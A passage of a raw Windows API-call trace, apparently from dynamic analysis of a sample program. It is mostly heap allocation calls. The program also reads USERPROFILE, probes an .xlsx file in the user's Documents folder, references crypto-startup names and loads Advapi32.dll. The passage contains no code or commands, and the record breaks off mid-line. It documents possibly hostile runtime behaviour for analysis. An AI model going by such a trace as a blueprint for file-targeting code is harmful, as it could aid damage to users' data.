RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0259.606] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0259.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0259.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0259.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0259.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.608] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0259.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0259.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.611] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0259.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.611] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.612] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/9mu- e5Z.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7d66ea0, ftCreationTime.dwHighDateTime=0x1d5e682, ftLastAccessTime.dwLowDateTime=0x2a9d9ec0, ftLastAccessTime.dwHighDateTime=0x1d5e4a4, ftLastWriteTime.dwLowDateTime=0x2a9d9ec0, ftLastWriteTime.dwHighDateTime=0x1d5e4a4, nFileSizeHigh=0x0, nFileSizeLow=0x42be, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="9mu- e5Z.xlsx", cAlternateFileName="9MU-E5~1.XLS")) returned 0xa87650 [0259.612] FindClose (in: hFindFile=0xa87650 | out: hFindFile=0xa87650) returned 1 [0259.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.614] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0259.614] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.614] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0259.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0259.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0259.618] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.619] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 